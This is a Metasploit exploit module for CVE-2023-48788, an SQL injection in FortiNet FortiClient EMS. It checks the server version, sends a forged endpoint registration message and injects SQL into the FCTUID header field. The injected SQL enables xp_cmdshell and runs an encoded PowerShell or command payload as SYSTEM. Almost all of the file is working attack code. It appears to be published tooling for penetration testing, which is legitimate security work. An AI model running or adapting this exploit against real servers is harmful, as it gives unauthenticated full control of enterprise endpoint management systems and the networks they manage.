modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Tcp
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'FortiNet FortiClient Endpoint Management Server FCTID SQLi to RCE',
'Description' => %q{
An SQLi injection vulnerability exists in FortiNet FortiClient EMS (Endpoint Management Server).
FortiClient EMS serves as an endpoint management solution tailored for enterprises, offering a centralized
platform for overseeing enrolled endpoints. The SQLi is vulnerability is due to user controller strings which
can be sent directly into database queries.
FcmDaemon.exe is the main service responsible for communicating with enrolled clients. By default it listens on port 8013
and communicates with FCTDas.exe which is responsible for translating requests and sending them to the database.
In the message header of a specific request sent between the two services, the FCTUID parameter is vulnerable
SQLi. The SQLi can used to enable the xp_cmdshell which can then be used to obtain unauthenticated remote code
execution in the context of NT AUTHORITY\SYSTEM
Affected versions of FortiClient EMS include:
7.2.0 through 7.2.2
7.0.1 through 7.0.10
Upgrading to either 7.2.3, 7.0.11 or above is recommended by FortiNet.
It should be noted that in order to be vulnerable, at least one endpoint needs to be enrolled / managed by FortiClient
EMS for the necessary vulnerable services to be available.
},
'Author' => [
'Zach Hanley', # Analysis & PoC
'James Horseman', # Analysis & PoC
'jheysel-r7', # Msf module
'Spencer McIntyre' # Msf module assistance
],
'References' => [
[ 'URL', 'https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-fortinet-forticlientems-sql-injection-deep-dive/'],
[ 'URL', 'https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-revisiting-fortinet-forticlient-ems-to-exploit-7-2-x/'],
[ 'URL', 'https://github.com/horizon3ai/CVE-2023-48788/blob/main/CVE-2023-48788.py'],
[ 'CVE', '2023-48788']
],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Privileged' => true,
'Arch' => [ ARCH_CMD ],
'Targets' => [
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2024-04-21',
'DefaultOptions' => {
'SSL' => true,
'RPORT' => 8013
},
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ]
}
)
)
end
def get_register_info
if @version >= Rex::Version.new('7.2')
vprint_status('Returning SYSINFO for 7.2 target')
register_info = <<~REGISTER_INFO
FCTOS=WIN64
OSVER=Microsoft Windows 10 Professional Edition, 64-bit (build 19045)
RSENG_VER=1.00182
COM_MODEL=VMware7,1
AVSIG_VER=1.00000
UTC=1721756626
PC_DOMAIN=kerberos.issue
COM_MAN=VMware, Inc.
CPU=Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz
COM_SN=VMware-56 4d 8a d5 7b 39 3b 0d-33 c6 25 6a e4 51 f7 4d
DHCP_SERVER=None
FCTVER=7.2.2.0864
EP_ONNETCHKSUM=0
AVENG_VER=6.00287
APPSIG_VER=28.00831
USER=msfuser
APPENG_VER=4.00082
VULSIG_VER=1.00708
AVALSIG_VER=0.00000
VULENG_VER=2.00037
AV_PROTECTED=1
AVALENG_VER=0.00000
PEER_IP=162.156.58.199
ENABLED_FEATURE_BITMAP=16
EP_OFFNETCHKSUM=0
INSTALLED_FEATURE_BITMAP=420727
EP_CHKSUM=0
HIDDEN_FEATURE_BITMAP=418087
GROUP_TAG=
ENABLED_APPS=0
INSTALLED_APPS=0
DISKENC=
HOSTNAME=client
AV_PRODUCT=Microsoft Defender Antivirus
FCT_SN=FCT8003173689730
INSTALLUID=#{Faker::Internet.uuid.upcase}
NWIFS=Ethernet0|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|1|*|0
MEM=16383
HDD=119
DOMAIN=
WORKGROUP=
USER_SID=S-1-5-21-#{rand(9) * 10}-#{rand(9) * 10}-#{rand(9) * 10}-500
ADGUID=
EP_FGTCHKSUM=0
EP_RULECHKSUM=0
WF_FILESCHKSUM=0
EP_APPCTRLCHKSUM=0
REGISTER_INFO
else
vprint_status('Returning SYSINFO for 7.0 target')
register_info = <<~REGISTER_INFO
AVSIG_VER=1.00000
REG_KEY=_
EP_ONNETCHKSUM=0
AVENG_VER=6.00266
DHCP_SERVER=None
FCTOS=WIN64
VULSIG_VER=1.00000
FCTVER=7.0.7.0345
APPSIG_VER=13.00364
USER=Administrator
APPENG_VER=4.00082
AVALSIG_VER=0.00000
VULENG_VER=2.00032
OSVER=Microsoft Windows Server 2019 , 64-bit (build 17763)
COM_MODEL=VMware Virtual Platform
RSENG_VER=1.00020
AV_PROTECTED=0
AVALENG_VER=0.00000
PEER_IP=
ENABLED_FEATURE_BITMAP=49
EP_OFFNETCHKSUM=0
INSTALLED_FEATURE_BITMAP=158583
EP_CHKSUM=0
HIDDEN_FEATURE_BITMAP=155943
DISKENC=
HOSTNAME=CYBER-RETQB1FLP
AV_PRODUCT=
FCT_SN=FCT8001638848651
INSTALLUID=#{Faker::Internet.uuid.upcase}
NWIFS=Ethernet0|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|1|*|0
UTC=1710271774
PC_DOMAIN=
COM_MAN=VMware, Inc.
CPU=Intel(R) Xeon(R) Silver 4215 CPU @ 2.50GHz
MEM=12287
HDD=99
COM_SN=VMware-42 04 ed 2d 64 e8 0b 14-45 e9 e4 f6 5a c7 67 82
DOMAIN=
WORKGROUP=WORKGROUP
USER_SID=S-1-5-21-#{rand(9) * 10}-#{rand(9) * 10}-#{rand(9) * 10}-500
GROUP_TAG=
ADGUID=
EP_FGTCHKSUM=0
EP_RULECHKSUM=0
WF_FILESCHKSUM=0
EP_APPCTRLCHKSUM=0
REGISTER_INFO
end
Rex::Text.encode_base64(register_info)
end
def get_version
message = "MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD\n"
message << "SIZE= {SIZE_PLACEHOLDER}\n"
message << "X-FCCK-PROBE: PROBE_FEATURE_BITMAP0|1|\n"
message << 'X-FCCK-PROBE-END'
message << "\r\n"
message << "\r\n"
message_length = message.length
message_length = message_length - '{SIZE_PLACEHOLDER}'.length + message_length.to_s.length
message.gsub!('{SIZE_PLACEHOLDER}', message_length.to_s)
buf = send_message(message)
# Example response from a 7.2.2 target:
# FGT|FCTEMS0000127184:dc2|FEATURE_BITMAP|7|EMSVER|7002002|PROTO_VERSION|1.0.0|PERCON|1|
# 7.0.7:
# FGT|FCTEMS0000125975:dc2.kerberos.issue|FEATURE_BITMAP|7|EMSVER|7000007|
if buf =~ /EMSVER\|(\d{2})(\d{2})(\d{3})\|/
major = (::Regexp.last_match(1).to_i / 10)
minor = ::Regexp.last_match(2).to_i
patch = ::Regexp.last_match(3).to_i
return Rex::Version.new("#{major}.#{minor}.#{patch}")
end
nil
end
def get_message(sqli)
message = "MSG_HEADER: FCTUID={SQLI_PLACEHOLDER}\n"
message << "SIZE= {SIZE_PLACEHOLDER}\r\n"
message << "\n"
# For 7.0 versions the register info gets placed after two pipe operators, for 7.2 it gets placed in between.
if @version >= Rex::Version.new('7.2')
message << "X-FCCK-REGISTER:SYSINFO|#{get_register_info}|\r\n"
else
message << "X-FCCK-REGISTER:SYSINFO||#{get_register_info}\r\n"
end
message << "\n"
message << 'X-FCCK-REGISTER-END'
message << "\r\n\r\n"
message.gsub!('{SQLI_PLACEHOLDER}', sqli)
message_length = message.length
message_length = message_length - '{SIZE_PLACEHOLDER}'.length + message_length.to_s.length
message.gsub!('{SIZE_PLACEHOLDER}', message_length.to_s)
message
end
def send_message(message)
vprint_status("Sending the following message:\n #{message}")
buf = ''
begin
connect(true, { 'SSL' => true })
sock.put(message)
buf = sock.get_once || ''
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
ensure
disconnect
end
vprint_status("The response received was: #{buf}")
buf
end
def check
@version = get_version
return CheckCode::Unknown("#{peer} - Version info was unable to be extracted from the target. FmcDaemon.exe might not be running.") unless @version
if @version.between?(Rex::Version.new('7.2.0'), Rex::Version.new('7.2.2')) || @version.between?(Rex::Version.new('7.0.1'), Rex::Version.new('7.0.10'))
return CheckCode::Appears("Version detected: #{@version}")
end
CheckCode::Safe("Version detected: #{@version}")
end
def exploit
# Things to note:
# 1. xp_cmdshell is disabled by default so we must enable it.
# 2. The application takes the SQL statement we inject into and converts the string to upper case. This is why the
# payload is converted to a case insensitive encoding like URL or hex before running the command with xp_command shell.
# 3. We don't expect a response when delivering the payload
# 4. The double quote is a bad char in the SQLi for 7.0.x versions
# 5. The equals sign is a bad char in the SQLi for 7.2.x versions
@version ||= get_version
if @version >= Rex::Version.new('7.2')
pload = "EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND \"\"Add-Type -AssemblyName System.Web; CMD.EXE /C ([SYSTEM.WEB.HTTPUTILITY]::URLDECODE(\"\"\"#{Rex::Text.uri_encode(payload.encoded, 'hex-all')}\"\"\"))\"\"'"
else
pload = "DECLARE @SQL VARCHAR(#{payload.encoded.length}) = CONVERT(VARCHAR(MAX), 0X#{payload.encoded.unpack('H*').first}); exec xp_cmdshell @sql"
end
sqli_injection = "';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; #{pload};--"
send_message(get_message(sqli_injection)).empty? ? print_good("The SQLi: #{sqli_injection} was executed successfully") : print_error('The SQLi injection response indicated the injection was unsuccessful.')
end
end